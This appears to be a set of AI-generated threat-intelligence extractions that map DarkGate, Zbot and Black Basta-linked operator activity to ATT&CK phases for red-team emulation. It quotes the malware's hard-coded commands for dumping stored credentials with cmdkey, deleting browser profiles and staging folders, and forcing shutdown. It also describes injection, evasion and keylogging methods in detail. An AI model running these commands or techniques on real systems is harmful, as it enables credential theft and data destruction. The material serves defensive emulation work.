Phase: Credential Access

  • Technique: Kerberoasting (DarkGate)
    • Procedure: Perform Kerberoasting after gaining initial access.
  • Technique: Credentials Stored in Site Manager
    • Procedure: Steal saved credentials stored in Filezilla Site manager

Phase: Lateral Movement

  • Technique: Remote Service Execution (DarkGate)
    • Procedure: Utilize Remote Service Execution
  • Technique: SSH Reverse Tunnels (DarkGate)
    • Procedure: Attempt to use SSH reverse tunnels for lateral movement.

Phase: Discovery

  • Technique: System and User Discovery (DarkGate)
    • Procedure: Enumerate asset and user information within the environment after gaining access.

Phase: Impact

  • Technique: Remove Infection Files (DarkGate)
    • Procedure: Remove infection files by using cmd.exe to delete the staging directories.
  • Technique: System Shutdown (DarkGate)
    • Procedure: Use the shutdown command to turn the system off.
  • Technique: System Restart (DarkGate)
    • Procedure: Use the shutdown command to restart the system.
  • Technique: Stealing Stored Browser Credentials (DarkGate)
    • Procedure: Attempt to steal Opera cookies if present, after terminating the process.
  • Technique: Code Injection (DarkGate)
    • Procedure: Unconditionally log keystrokes and clipboard data to a log file in an encrypted fashion.

DarkGate Hard-coded Commands (Examples)

  • /c cd /d "C:\Users\User\AppData\Roaming\<browser_dir>" && move <browser_name> <browser_name><random_alphabet_string>
  • /c cmdkey /delete:
  • /c cmdkey/list > c:\temp\cred.txt
  • /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox*
  • /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\
  • /c shutdown -f -r -t o
  • /c shutdown -f -s -t o
  • /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

This structured output should provide a solid foundation for a red team to emulate the Black Basta ransomware operator's tactics and techniques. Remember to adapt and modify these procedures based on your specific testing environment.

Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured extraction of the threat actor's procedures for red team emulation, focusing on commands, tools, and techniques, while excluding specific IOCs.

Phase: Initial Access

  • Technique: Phishing: Spearphishing Voice (T1566.004)
    • Procedure: The threat actor initiates a social engineering campaign by email-bombing target users, often by signing them up to numerous mailing lists simultaneously.
    • Procedure: The threat actor contacts impacted users via Microsoft Teams as an external user, attempting to call or message them to offer assistance.
    • Procedure: The threat actor impersonates IT staff, using display names such as "Help Desk", "Technical Support", or "Administracion".

Phase: Execution

  • Technique: Remote Access Software (T1219)
    • Procedure: If the user interacts, the threat actor attempts to persuade them to install or execute remote management (RMM) tools, including QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect.
  • Technique: Protocol Tunneling (T1572) / Command and Scripting Interpreter: PowerShell (T1059.001)
    • Procedure: The threat actor attempts to leverage the native Windows OpenSSH client to establish a reverse shell.
  • Technique: Signed Binary Proxy Execution: Rundll32 (T1218.011)
    • Command: rundll32.exe <MalwareDLL.dll>,epaas_request_clone (Executes the DLL variant of the credential harvester.)
  • Technique: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
    • Procedure: The threat actor sends short commands via Microsoft Teams that, when executed by the user, initiate an infection chain.
  • Technique: Process Injection (T1055) / Process Hollowing (T1055.012)
    • Procedure: Zbot malware (e.g., SyncSuite.exe) loads a fresh copy of ntdll.dll to avoid hooking.
    • Procedure: Zbot malware injects itself into a suspended instance of msedge.exe (created using NtCreateUserProcess and executed via ResumeThread).
    • Procedure: DarkGate malware injects shellcode into a specified process (e.g., Edge/Chrome processes or cmd.exe) via ResumeThread or CreateRemoteThread.
    • Procedure: DarkGate selects injection targets by searching for updatecore.exe within hardcoded directories like C:\Program Files (x86)\Microsoft\EdgeUpdate\ or C:\Program Files (x86)\Google\Update\. If not found, it defaults to C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe.
  • Technique: Command and Scripting Interpreter: AutoIt (T1059.004)
    • Procedure: DarkGate delivers an AU3 variant, which creates script.a3x and Autoit3.exe in c:\temp and executes script.a3x via Autoit3.exe using CreateProcessA.
  • Technique: Command and Scripting Interpreter: AutoHotkey (T1059.005)
    • Procedure: DarkGate delivers an AHK variant, which creates script.ahk, test.txt, and AutoHotkey.exe in c:\temp and executes script.ahk via AutoHotkey.exe using CreateProcessA.
  • Technique: Custom Payload Execution
    • Procedure: DarkGate delivers a DLL variant, which creates libcurl.dll, test.txt, and GUP.exe in c:\temp and executes GUP.exe via CreateProcessA.

Phase: Persistence

  • Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
    • Procedure: Zbot malware copies itself to a random folder within the %APPDATA% directory and establishes persistence by creating a Run key (named after the executable) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
    • Procedure: DarkGate malware creates a Run key (e.g., named "daaadeh" or other custom string) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run. This key points to copies of Autoit3.exe and a compiled AU3 script payload (e.g., dgfeabe.a3x) located in its main directory (C:\ProgramData\<random_hash_mainfolder_name>). Autoit3.exe then executes the AU3 script when the user logs on.
  • Technique: Scheduled Task/Job (T1053.005)
    • Procedure: Zbot malware establishes persistence by creating a scheduled task (named after the executable) that executes the malware copy in %APPDATA% whenever the user logs on.

Phase: Defense Evasion

  • Technique: Obfuscated Files or Information (T1027) / Deobfuscate/Decode Files or Information (T1140)
    • Procedure: The threat actor encrypts some zip archive payloads with a password.
    • Procedure: Credential harvester samples decrypt shellcode from embedded resources using an XOR key.
    • Procedure: Zbot malware stores strings and configuration encrypted within its .rdata section, decrypting them via XOR and RC4 operations.
    • Procedure: DarkGate malware decrypts its configuration using a customized XOR loop.
  • Technique: Process Injection (T1055)
    • Procedure: Multiple payloads executed by the threat actor utilize local PE injection.
  • Technique: Reflective Code Loading (T1620)
    • Procedure: Multiple payloads executed by the threat actor load and execute shellcode.
  • Technique: Subvert Trust Controls: Code Signing (T1553.002)
    • Procedure: Malware payloads are signed with likely stolen code signing certificates.
  • Technique: Parent PID Spoofing (T1055.004)
    • Procedure: DarkGate attempts to spoof the parent process ID (PPID) of its injection target by enumerating running processes for accessibility using OpenProcess and randomly selecting one to use with UpdateProcThreadAttribute prior to CreateProcessA.
  • Technique: Virtualization/Sandbox Evasion (T1497)
    • Procedure: DarkGate checks for known virtual machine display strings using EnumDisplayDevicesa (though this was observed as disabled for one sample).
    • Procedure: DarkGate checks for specific registry keys, such as ProcessorNameString for "xeon".
    • Procedure: DarkGate attempts to bypass detected security products by initiating calls (e.g., rtladjustPrivilege, NtRaiseHardError) to crash the system if a specific file is not present and a Kaspersky product is detected.
  • Technique: Process Discovery (T1057)
    • Procedure: DarkGate checks running processes using CreateToolhelp32Snapshot and related functions, comparing them against a hard-coded list of security products (e.g., Windows Defender, Sophos, Kaspersky, Avast, Bitdefender, etc.).
  • Technique: Indicator Removal on Host: File Deletion (T1070.004)
    • Command: cmd.exe /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox* (Deletes Firefox browser data.)
    • Command: cmd.exe /c ping 127.0.0.1 & del /q /f /s C:\ProgramData\<random_hash_mainfolder_name>\ & rmdir /s /q C:\ProgramData\<random_hash_mainfolder_name>\ (Cleans up the malware's main directory.)
    • Command: cmd.exe /c del /q /f /s c:\temp (Deletes temporary files in c:\temp.)
    • Procedure: DarkGate deletes its persistence Run key if blacklisted analysis tools (e.g., Process Hacker, Process Monitor, Task Manager, Windows Registry Editor) are detected running in the active window.

Phase: Credential Access

  • Technique: Input Capture: Keylogging (T1056.001)
    • Procedure: DarkGate unconditionally logs keystrokes from the infected system.
  • Technique: Input Capture: Clipboard Data (T1056.004)
    • Procedure: DarkGate unconditionally logs clipboard data (under 1024 bytes).
  • Technique: OS Credential Dumping (T1003)
    • Procedure: The threat actor executes a custom credential harvester (DLL or Java variant) that prompts the user for their password. This information is saved to a file (e.g., 123.txt in %TEMP% or a randomly named .txt file in the current working directory for the Java variant).
  • Technique: Credentials from Password Stores: Browser (T1555.003)
    • Procedure: DarkGate renames browser directories (Firefox, Chrome, Brave) after terminating related browser executables.
    • Procedure: DarkGate attempts to steal Opera browser cookies after terminating the process.
  • Technique: Credentials from Password Stores: Credential Manager (T1555.004)
    • Command: cmdkey /list > <path_to_output_file> (Lists stored credentials from Windows Credential Manager to a file.)
    • Command: cmdkey /delete:<target> (If running with administrative privileges, deletes stored credentials.)
  • Technique: Steal Application Access Token (T1528) / Credentials from Password Stores: FileZilla (T1555.002)
    • Procedure: DarkGate steals sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.
  • Technique: Steal or Forge Authentication Certificates (T1649)
    • Procedure: The threat actor attempts to steal available VPN configuration files.

Phase: Discovery

  • Technique: System Information Discovery (T1082)
    • Command: cmd.exe /c systeminfo (Executed by the credential harvester.)
    • Command: cmd.exe /c ipconfig /all (Executed by the credential harvester.)
    • Command: cmd.exe /c route print (Executed by the credential harvester.)
    • Command: cmd.exe /c wmic ComputerSystem get domain > <path_to_output_file> (DarkGate collects domain information and saves it to a file.)
    • Procedure: The threat actor quickly enumerates the environment after gaining initial access.
  • Technique: Account Discovery (T1087)
    • Procedure: Zbot malware collects the hostname, username, and installation date from the victim system's registry.

Phase: Command and Control

  • Technique: Remote Access Software (T1219)
    • Procedure: The threat actor uses RMM tools (QuickAssist, AnyDesk, TeamViewer, Level, ScreenConnect) to facilitate remote control of the compromised asset.
  • Technique: Command and Scripting Interpreter: PowerShell (T1059.001)
    • Procedure: DarkGate can create a remote shell via powershell.exe as a remote command (Command ID 1049).
  • Technique: Command and Scripting Interpreter: Windows Command Shell (T1059.003)
    • Procedure: DarkGate can create a remote shell via cmd.exe as a remote command (Command ID 1093).
  • Technique: Application Layer Protocol (T1071)
    • Procedure: DarkGate sends logged data (keystrokes, clipboard, active window text, user idle time, admin rights status) to command and control servers.

Phase: Impact

  • Technique: Data Destruction (T1485) / Disk Wipe (T1490)
    • Procedure: DarkGate (Command ID 1111) creates ransom.txt and decrypter.exe in c:\temp, then terminates decrypter.exe if already running and executes it via CreateProcessA (likely for ransomware deployment).
  • Technique: System Shutdown/Reboot (T1529)
    • Command: shutdown -f -s -t o (DarkGate remote command to forcefully shutdown the system, Command ID 1083).
    • Command: shutdown -f -r -t o (DarkGate remote command to forcefully restart the system, Command ID 1084).
  • Technique: Service Stop (T1489) / Indirect Command Execution (T1564.004)
    • Procedure: DarkGate uses NTAPI calls RtlAdjustPrivilege and NtRaiseHardError to crash the system (Command ID 1081).